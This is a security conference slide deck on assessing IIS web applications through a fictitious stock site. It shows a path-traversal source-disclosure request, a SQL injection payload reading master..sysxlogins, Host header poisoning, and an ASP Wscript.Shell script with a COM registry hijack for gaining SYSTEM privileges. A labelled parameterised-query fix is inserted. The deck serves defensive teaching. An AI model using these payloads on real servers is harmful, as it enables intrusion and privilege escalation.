
Application Assessments on IIS

Welcome!
David Litchfield
(d.litchfield@atstake.com)

What is an Application Assessment?

Part of a network vulnerability assessment
Application provides the site functionality
Application is least tested but often proves to be the greatest risk

Vulnerability Scanners
Cybercop
I. S. S.
Cerberus Internet Scanner

What scanners do

They highlight known vulnerabilities in COTS products:
Webhits.dll and null.htw
MSADC and RDS
Ism.dll and .htr overflow
%C0%AF UNICODE issue

What scanners don't do

They won't assess your application

Assessing the Application

What services does the site offer?
What functionality exists to provide these services?
What drives this functionality?
How does it do this?

Stocks-r-us.com

Free charting service of current/real-time market trends
A subscriber service providing detailed market analysis
An 'I've forgot my password' service
A contact service
Apply for a job with stocks-r-us.com online service

Free charting service of current/real-time market trends

From a web form a user chooses the stock market
They also choose a time range
On submitting, a page called read_img.asp returns a graph of the ups and downs of the market:

http://www.stocks-r-us.com/read_img.asp?IDN=00000008&IFN=AXYZPQ&IFE=png

http://www.stocks-r-us.com/read_img.asp?IDN=&IFN=&IFE=

Exception Handling

ASP Error 800814:
Create object failed in /includes/olectra.inc

Downloading the .inc file reveals nothing, but there are two issues here: bad exception handling, and .inc has not been mapped to asp.dll
A search on Google reveals Olectra Chart

Source code revelation!

Olectra creates a virtual directory called /octemp
When a graph or chart is produced a temp directory is created in the /octemp directory. This directory's name is a number like 00000008
The dynamically produced graph is a random string of letters such as AXYZPQ and has a file extension of .png

/read_img.asp?IDN=../&IFN=read_img&IFE=asp

SQL Queries

strSQL = "select price from stocks where name = '" _
    & request.querystring("company") & "'"

This code is insecure!!!

Why?

By setting the company parameter to something such as:

ISSX' select * from master..sysxlogins

Would execute the two queries in batch mode:
Select price from stocks where name = 'ISSX'
Select * from master..sysxlogins

sa login on MS SQL Server
xp_cmdshell extended stored procedure

On its own, ASP will not escape a single ' (quote mark)

.idc files will.

Change all 's provided in a parameter to 0x27 or strip them out

Consideration for integer input

strSQL = "Select company from stocks where price > " & request.querystring("price")

Again we can insert an arbitrary SQL query here and have it execute.

Verifying numeric input

IsNumeric() for VBScript
isNaN() for JScript
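Added example, not from the original slides and not stocks-r-us.com's or Olectra's code: the two query fragments above and the numeric check rewritten in classic ASP so that user input is bound as a typed parameter rather than concatenated into the statement. It assumes an ADO connection string in Application("ConnString") and a SQL Server table stocks(name, company, price).

```vbscript
<%
' Added example, not from the original slides: the two charting queries
' above rewritten so that user input never becomes SQL text. Assumed: an
' ADO connection string in Application("ConnString") and a SQL Server
' table stocks(name, company, price).
Option Explicit
Const adVarChar = 200
Const adInteger = 3
Const adParamInput = 1
' Replaces: strSQL = "select price from stocks where name = '" & ... & "'"
' The name is bound as a typed parameter, so a ' in the input is data,
' not the start of a second batch statement; no 0x27 rewriting needed.
Function GetPrice(conn, company)
    Dim cmd, rs
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandText = "SELECT price FROM stocks WHERE name = ?"
    cmd.Parameters.Append cmd.CreateParameter("name", adVarChar, adParamInput, 50, company)
    Set rs = cmd.Execute
    If rs.EOF Then GetPrice = Null Else GetPrice = rs("price")
    rs.Close
End Function
' Replaces: "Select company from stocks where price > " & querystring("price")
' IsNumeric() alone is not enough (it also accepts forms such as "1e3" and
' "&H10"): reject non-numbers, convert to a real Long, bind it as adInteger.
Function CompaniesAbove(conn, priceText)
    Dim cmd, rs, price, result
    If Not IsNumeric(priceText) Then Err.Raise vbObjectError + 1, "CompaniesAbove", "price must be numeric"
    price = CLng(priceText)
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandText = "SELECT company FROM stocks WHERE price > ?"
    cmd.Parameters.Append cmd.CreateParameter("price", adInteger, adParamInput, , price)
    Set rs = cmd.Execute
    result = ""
    Do Until rs.EOF
        result = result & rs("company") & vbCrLf
        rs.MoveNext
    Loop
    rs.Close
    CompaniesAbove = result
End Function
Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnString")
Response.Write GetPrice(conn, Request.QueryString("company"))
Response.Write CompaniesAbove(conn, Request.QueryString("price"))
conn.Close
%>
```

The "?" placeholders are bound by the SQL Server OLE DB/ODBC provider, so the statement text the server sees is fixed no matter what the query string contains.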

r.f.p Rain Forest Puppy

http://www.wiretrip.net/rfp

Contact Service

<%
..
Set SMTPObj = GetObject("IIS://" & request.servervariables("SERVER_NAME") & "/SMTPSVC")
..
%>

HTTP SERVER_NAME Poisoning

Host: HTTP client header field

Learn the password hash for the IWAM account
Enumerate SQL servers
Proxy attacks
Samples on IIS
ADSI, CORBA and COM

On-line job application service

As part of this service stocks-r-us.com allow uploading of Curriculum Vitaes / Resumes

Client-side checking doesn't work

Scripting enabled on the /cvtemp virtual directory

Gaining SYSTEM Privileges using ASP

IIS Security Model
IUSR and IWAM accounts

Wscript.Shell Object

Set WSObj = CreateObject("wscript.shell")
Read from the Registry
Write to the Registry
Execute commands

MSI.ASP
<%
' Wscript.Shell runs whatever the page hands it with the identity of the
' web worker process (IUSR/IWAM), so any upload directory with scripting
' enabled becomes a command prompt.
Dim WshShell, strCMD, strCMD2, result
strCMD = "cmd.exe /c c:\inetpub\wwwroot\msi.reg"
strCMD2 = "cmd.exe /c c:\inetpub\wwwroot\msi.msi"
Set WshShell = Server.CreateObject("Wscript.Shell")
On Error Resume Next
result = WshShell.Run(strCMD)
result = WshShell.Run(strCMD2)
%>

MSI.REG

REGEDIT4

[HKEY_CLASSES_ROOT\CLSID\{000C103E-0000-0000-C000000000000046}\InProcServer32]
@="c:\\inetpub\\wwwroot\\foo.dll"
"ThreadingModel"="Both"

Summary
Understand the technology you're dealing with
Never trust user input anywhere
Ensure permissions are set properly
Don't trust third-party software until truly evaluated
Don't rely on client-side checking
Scanners won't find these problems; you will

Questions?

Thanks, and enjoy the rest of the day!